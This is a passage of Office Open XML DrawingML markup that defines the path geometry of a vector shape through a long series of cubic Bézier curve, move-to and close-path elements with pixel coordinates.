                  <a:pt x="156" y="166"/>
                  <a:pt x="170" y="167"/>
                  <a:pt x="185" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="185" y="161"/>
                  <a:pt x="190" y="160"/>
                  <a:pt x="192" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="197" y="156"/>
                  <a:pt x="202" y="159"/>
                  <a:pt x="207" y="161"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="161"/>
                  <a:pt x="217" y="161"/>
                  <a:pt x="220" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="227" y="158"/>
                  <a:pt x="231" y="163"/>
                  <a:pt x="233" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="168"/>
                  <a:pt x="269" y="168"/>
                  <a:pt x="288" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="149"/>
                  <a:pt x="289" y="127"/>
                  <a:pt x="288" y="106"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="272" y="245"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="227"/>
                  <a:pt x="270" y="208"/>
                  <a:pt x="269" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="265" y="186"/>
                  <a:pt x="264" y="186"/>
                  <a:pt x="261" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="259" y="193"/>
                  <a:pt x="261" y="202"/>
                  <a:pt x="261" y="211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="216"/>
                  <a:pt x="261" y="222"/>
                  <a:pt x="261" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="233"/>
                  <a:pt x="262" y="238"/>
                  <a:pt x="262" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="254"/>
                  <a:pt x="262" y="264"/>
                  <a:pt x="263" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="263" y="276"/>
                  <a:pt x="263" y="278"/>
                  <a:pt x="264" y="279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="279"/>
                  <a:pt x="270" y="277"/>
                  <a:pt x="272" y="276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="273" y="267"/>
                  <a:pt x="273" y="255"/>
                  <a:pt x="272" y="245"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="261" y="254"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="256"/>
                  <a:pt x="258" y="255"/>
                  <a:pt x="257" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="260"/>
                  <a:pt x="258" y="269"/>
                  <a:pt x="257" y="275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="259" y="277"/>
                  <a:pt x="260" y="278"/>
                  <a:pt x="261" y="279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="272"/>
                  <a:pt x="261" y="262"/>
                  <a:pt x="261" y="254"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="260" y="232"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="259" y="216"/>
                  <a:pt x="260" y="202"/>
                  <a:pt x="258" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="186"/>
                  <a:pt x="256" y="186"/>
                  <a:pt x="254" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="200"/>
                  <a:pt x="255" y="213"/>
                  <a:pt x="256" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="233"/>
                  <a:pt x="256" y="238"/>
                  <a:pt x="257" y="242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="258" y="242"/>
                  <a:pt x="259" y="241"/>
                  <a:pt x="260" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="239"/>
                  <a:pt x="259" y="235"/>
                  <a:pt x="261" y="232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="232"/>
                  <a:pt x="261" y="232"/>
                  <a:pt x="261" y="232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="232"/>
                  <a:pt x="260" y="232"/>
                  <a:pt x="260" y="232"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="261" y="248"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="248"/>
                  <a:pt x="258" y="248"/>
                  <a:pt x="257" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="250"/>
                  <a:pt x="257" y="251"/>
                  <a:pt x="257" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="259" y="251"/>
                  <a:pt x="260" y="253"/>
                  <a:pt x="261" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="251"/>
                  <a:pt x="261" y="249"/>
                  <a:pt x="261" y="248"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="260" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="259" y="244"/>
                  <a:pt x="257" y="243"/>
                  <a:pt x="256" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="244"/>
                  <a:pt x="257" y="245"/>
                  <a:pt x="257" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="258" y="245"/>
                  <a:pt x="259" y="246"/>
                  <a:pt x="261" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="245"/>
                  <a:pt x="260" y="244"/>
                  <a:pt x="260" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="255" y="248"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="248"/>
                  <a:pt x="253" y="248"/>
                  <a:pt x="253" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="250"/>
                  <a:pt x="253" y="250"/>
                  <a:pt x="253" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="252"/>
                  <a:pt x="254" y="252"/>
                  <a:pt x="255" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255" y="250"/>
                  <a:pt x="255" y="249"/>
                  <a:pt x="255" y="248"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="253" y="211"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="222"/>
                  <a:pt x="250" y="232"/>
                  <a:pt x="250" y="242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="241"/>
                  <a:pt x="253" y="242"/>
                  <a:pt x="255" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="231"/>
                  <a:pt x="254" y="221"/>
                  <a:pt x="253" y="211"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="253" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="253" y="244"/>
                  <a:pt x="253" y="245"/>
                  <a:pt x="253" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="246"/>
                  <a:pt x="254" y="246"/>
                  <a:pt x="254" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="245"/>
                  <a:pt x="254" y="243"/>
                  <a:pt x="253" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="252" y="206"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="205"/>
                  <a:pt x="253" y="206"/>
                  <a:pt x="253" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="199"/>
                  <a:pt x="253" y="191"/>
                  <a:pt x="252" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="186"/>
                  <a:pt x="248" y="185"/>
                  <a:pt x="247" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="246" y="190"/>
                  <a:pt x="246" y="195"/>
                  <a:pt x="246" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="245" y="206"/>
                  <a:pt x="243" y="213"/>
                  <a:pt x="242" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="241" y="225"/>
                  <a:pt x="241" y="232"/>
                  <a:pt x="240" y="235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="237"/>
                  <a:pt x="240" y="239"/>
                  <a:pt x="239" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="237" y="240"/>
                  <a:pt x="238" y="238"/>
                  <a:pt x="238" y="236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="238" y="235"/>
                  <a:pt x="238" y="233"/>
                  <a:pt x="239" y="231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="217"/>
                  <a:pt x="245" y="202"/>
                  <a:pt x="245" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="244" y="186"/>
                  <a:pt x="243" y="186"/>
                  <a:pt x="242" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="203"/>
                  <a:pt x="237" y="225"/>
                  <a:pt x="234" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="241"/>
                  <a:pt x="244" y="241"/>
                  <a:pt x="248" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="230"/>
                  <a:pt x="252" y="218"/>
                  <a:pt x="252" y="206"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="249" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="250"/>
                  <a:pt x="249" y="251"/>
                  <a:pt x="249" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="250" y="252"/>
                  <a:pt x="250" y="252"/>
                  <a:pt x="251" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="251"/>
                  <a:pt x="251" y="250"/>
                  <a:pt x="251" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="250" y="248"/>
                  <a:pt x="250" y="249"/>
                  <a:pt x="249" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="251" y="244"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="244"/>
                  <a:pt x="249" y="245"/>
                  <a:pt x="249" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="246"/>
                  <a:pt x="250" y="246"/>
                  <a:pt x="251" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="251" y="245"/>
                  <a:pt x="251" y="244"/>
                  <a:pt x="251" y="244"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="244" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="245" y="250"/>
                  <a:pt x="244" y="251"/>
                  <a:pt x="244" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="244" y="252"/>
                  <a:pt x="246" y="252"/>
                  <a:pt x="247" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="247" y="251"/>
                  <a:pt x="247" y="250"/>
                  <a:pt x="247" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="246" y="248"/>
                  <a:pt x="245" y="248"/>
                  <a:pt x="244" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="246" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="246" y="244"/>
                  <a:pt x="245" y="244"/>
                  <a:pt x="244" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="244" y="244"/>
                  <a:pt x="244" y="246"/>
                  <a:pt x="244" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="245" y="245"/>
                  <a:pt x="246" y="247"/>
                  <a:pt x="247" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="246" y="245"/>
                  <a:pt x="247" y="243"/>
                  <a:pt x="246" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="237" y="255"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="260"/>
                  <a:pt x="234" y="266"/>
                  <a:pt x="232" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="237" y="272"/>
                  <a:pt x="239" y="272"/>
                  <a:pt x="243" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="245" y="267"/>
                  <a:pt x="246" y="261"/>
                  <a:pt x="246" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="254"/>
                  <a:pt x="241" y="254"/>
                  <a:pt x="237" y="255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="242" y="244"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="236" y="242"/>
                  <a:pt x="231" y="243"/>
                  <a:pt x="225" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="244"/>
                  <a:pt x="213" y="243"/>
                  <a:pt x="206" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="243"/>
                  <a:pt x="203" y="243"/>
                  <a:pt x="201" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="192" y="243"/>
                  <a:pt x="186" y="243"/>
                  <a:pt x="178" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="242"/>
                  <a:pt x="159" y="244"/>
                  <a:pt x="150" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145" y="242"/>
                  <a:pt x="139" y="243"/>
                  <a:pt x="134" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="243"/>
                  <a:pt x="105" y="243"/>
                  <a:pt x="92" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="246"/>
                  <a:pt x="92" y="249"/>
                  <a:pt x="93" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="253"/>
                  <a:pt x="121" y="252"/>
                  <a:pt x="136" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174" y="252"/>
                  <a:pt x="202" y="252"/>
                  <a:pt x="242" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="242" y="250"/>
                  <a:pt x="243" y="247"/>
                  <a:pt x="242" y="244"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="240" y="186"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="186"/>
                  <a:pt x="240" y="186"/>
                  <a:pt x="239" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="234" y="186"/>
                  <a:pt x="230" y="186"/>
                  <a:pt x="226" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="186"/>
                  <a:pt x="217" y="186"/>
                  <a:pt x="214" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="185"/>
                  <a:pt x="196" y="185"/>
                  <a:pt x="189" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="185" y="186"/>
                  <a:pt x="181" y="185"/>
                  <a:pt x="177" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174" y="185"/>
                  <a:pt x="170" y="185"/>
                  <a:pt x="167" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167" y="185"/>
                  <a:pt x="166" y="185"/>
                  <a:pt x="165" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161" y="184"/>
                  <a:pt x="156" y="185"/>
                  <a:pt x="152" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="185"/>
                  <a:pt x="134" y="184"/>
                  <a:pt x="124" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="184"/>
                  <a:pt x="117" y="183"/>
                  <a:pt x="115" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="183"/>
                  <a:pt x="113" y="185"/>
                  <a:pt x="112" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="184"/>
                  <a:pt x="87" y="183"/>
                  <a:pt x="78" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="198"/>
                  <a:pt x="75" y="211"/>
                  <a:pt x="73" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="231"/>
                  <a:pt x="72" y="236"/>
                  <a:pt x="72" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="241"/>
                  <a:pt x="81" y="241"/>
                  <a:pt x="86" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="241"/>
                  <a:pt x="99" y="241"/>
                  <a:pt x="105" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="241"/>
                  <a:pt x="132" y="241"/>
                  <a:pt x="144" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158" y="241"/>
                  <a:pt x="169" y="242"/>
                  <a:pt x="181" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="197" y="241"/>
                  <a:pt x="216" y="242"/>
                  <a:pt x="233" y="241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="222"/>
                  <a:pt x="238" y="204"/>
                  <a:pt x="240" y="186"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="233" y="255"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="256"/>
                  <a:pt x="233" y="257"/>
                  <a:pt x="232" y="258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="262"/>
                  <a:pt x="228" y="267"/>
                  <a:pt x="231" y="270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="265"/>
                  <a:pt x="234" y="260"/>
                  <a:pt x="235" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="234" y="254"/>
                  <a:pt x="234" y="255"/>
                  <a:pt x="233" y="255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="187" y="170"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="190" y="172"/>
                  <a:pt x="193" y="173"/>
                  <a:pt x="197" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207" y="175"/>
                  <a:pt x="222" y="176"/>
                  <a:pt x="230" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="169"/>
                  <a:pt x="229" y="165"/>
                  <a:pt x="227" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="226" y="165"/>
                  <a:pt x="225" y="167"/>
                  <a:pt x="224" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="173"/>
                  <a:pt x="202" y="170"/>
                  <a:pt x="193" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="192" y="165"/>
                  <a:pt x="191" y="164"/>
                  <a:pt x="190" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="164"/>
                  <a:pt x="187" y="166"/>
                  <a:pt x="187" y="170"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="197" y="165"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="198" y="166"/>
                  <a:pt x="200" y="167"/>
                  <a:pt x="201" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="210" y="170"/>
                  <a:pt x="226" y="170"/>
                  <a:pt x="224" y="161"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="158"/>
                  <a:pt x="218" y="162"/>
                  <a:pt x="214" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="210" y="164"/>
                  <a:pt x="206" y="163"/>
                  <a:pt x="202" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="199" y="161"/>
                  <a:pt x="194" y="157"/>
                  <a:pt x="192" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="193" y="164"/>
                  <a:pt x="194" y="164"/>
                  <a:pt x="197" y="165"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="185" y="169"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="168"/>
                  <a:pt x="154" y="168"/>
                  <a:pt x="141" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="168"/>
                  <a:pt x="121" y="167"/>
                  <a:pt x="111" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="166"/>
                  <a:pt x="97" y="167"/>
                  <a:pt x="91" y="167"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="167"/>
                  <a:pt x="78" y="166"/>
                  <a:pt x="72" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="166"/>
                  <a:pt x="54" y="166"/>
                  <a:pt x="45" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="167"/>
                  <a:pt x="41" y="169"/>
                  <a:pt x="38" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="171"/>
                  <a:pt x="34" y="171"/>
                  <a:pt x="33" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="174"/>
                  <a:pt x="75" y="174"/>
                  <a:pt x="98" y="174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="174"/>
                  <a:pt x="115" y="174"/>
                  <a:pt x="123" y="174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="174"/>
                  <a:pt x="152" y="173"/>
                  <a:pt x="165" y="175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174" y="176"/>
                  <a:pt x="183" y="174"/>
                  <a:pt x="192" y="175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190" y="173"/>
                  <a:pt x="186" y="172"/>
                  <a:pt x="185" y="169"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="86" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="251"/>
                  <a:pt x="85" y="251"/>
                  <a:pt x="85" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="252"/>
                  <a:pt x="89" y="252"/>
                  <a:pt x="90" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="248"/>
                  <a:pt x="88" y="249"/>
                  <a:pt x="86" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="90" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="242"/>
                  <a:pt x="87" y="243"/>
                  <a:pt x="86" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="245"/>
                  <a:pt x="86" y="246"/>
                  <a:pt x="86" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87" y="247"/>
                  <a:pt x="88" y="247"/>
                  <a:pt x="90" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="245"/>
                  <a:pt x="90" y="244"/>
                  <a:pt x="90" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="243"/>
                  <a:pt x="81" y="243"/>
                  <a:pt x="81" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81" y="245"/>
                  <a:pt x="80" y="245"/>
                  <a:pt x="80" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82" y="247"/>
                  <a:pt x="83" y="247"/>
                  <a:pt x="84" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="246"/>
                  <a:pt x="84" y="244"/>
                  <a:pt x="84" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="80" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="250"/>
                  <a:pt x="80" y="251"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81" y="253"/>
                  <a:pt x="82" y="251"/>
                  <a:pt x="84" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="251"/>
                  <a:pt x="84" y="250"/>
                  <a:pt x="84" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83" y="249"/>
                  <a:pt x="82" y="249"/>
                  <a:pt x="80" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="75" y="245"/>
                  <a:pt x="74" y="246"/>
                  <a:pt x="75" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="246"/>
                  <a:pt x="78" y="247"/>
                  <a:pt x="79" y="247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="245"/>
                  <a:pt x="78" y="244"/>
                  <a:pt x="79" y="243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="243"/>
                  <a:pt x="76" y="243"/>
                  <a:pt x="75" y="243"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75" y="249"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="75" y="250"/>
                  <a:pt x="75" y="251"/>
                  <a:pt x="75" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="252"/>
                  <a:pt x="77" y="252"/>
                  <a:pt x="78" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="249"/>
                  <a:pt x="77" y="249"/>
                  <a:pt x="75" y="249"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66" y="183"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="200"/>
                  <a:pt x="62" y="219"/>
                  <a:pt x="59" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="245"/>
                  <a:pt x="59" y="252"/>
                  <a:pt x="57" y="258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="265"/>
                  <a:pt x="56" y="273"/>
                  <a:pt x="56" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="278"/>
                  <a:pt x="62" y="279"/>
                  <a:pt x="65" y="280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="278"/>
                  <a:pt x="67" y="277"/>
                  <a:pt x="66" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="275"/>
                  <a:pt x="67" y="274"/>
                  <a:pt x="67" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="268"/>
                  <a:pt x="68" y="260"/>
                  <a:pt x="69" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="254"/>
                  <a:pt x="67" y="254"/>
                  <a:pt x="67" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="252"/>
                  <a:pt x="69" y="253"/>
                  <a:pt x="69" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="229"/>
                  <a:pt x="74" y="204"/>
                  <a:pt x="76" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="183"/>
                  <a:pt x="76" y="183"/>
                  <a:pt x="76" y="183"/>
                </a:cubicBezTo>
